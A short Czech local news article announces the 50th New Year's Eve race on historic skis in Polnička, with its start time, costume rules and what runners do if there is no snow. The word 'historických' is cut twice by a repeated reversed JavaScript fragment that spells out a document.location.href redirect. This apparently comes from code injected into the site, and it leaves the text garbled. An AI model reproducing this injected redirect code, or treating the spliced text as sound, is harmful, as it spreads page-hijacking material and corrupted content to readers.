Rainbow page separator

Lyžníci budou na sněhu, anebo bez něj závodit už popadesáté

Pondělí, 30. prosince 2019

Polnička / Jubilejní 50. ročník Silvestrovského běhu na his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických lyžích se v úterý 31. prosince uskuteční v Polničce. Akci opět pořádá obec s místními dobrovolnými hasiči a restaurací Polnička, od níž se poslední den roku v 10 hodin zároveň startuje.
Při recesistickém závodu, který obvykle přechází v tradiční oslavy odchodu starého a příchodu nového roku, jsou požadovány co nejstarší lyže, nejlépe tradiční „jasanky“, jež si obyvatelé Polničky i další účastníci silvestrovského podniku rok co rok snášejí z půd. Doporučeny jsou taktéž odpovídající oděvy. Děti mají při tradičním klání povoleny klasické lyže, přičemž při nedostatku sněhu běží na trati dlouhé asi tři sta metrů.
Dospělí závodníci, u nichž jsou vítány nejenom his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické, ale i různé jiné kostýmy podle vlastního uvážení, jsou v případě nedostatku sněhu povinni si lyže hodit přes rameno a zdolat vytyčenou trasu během.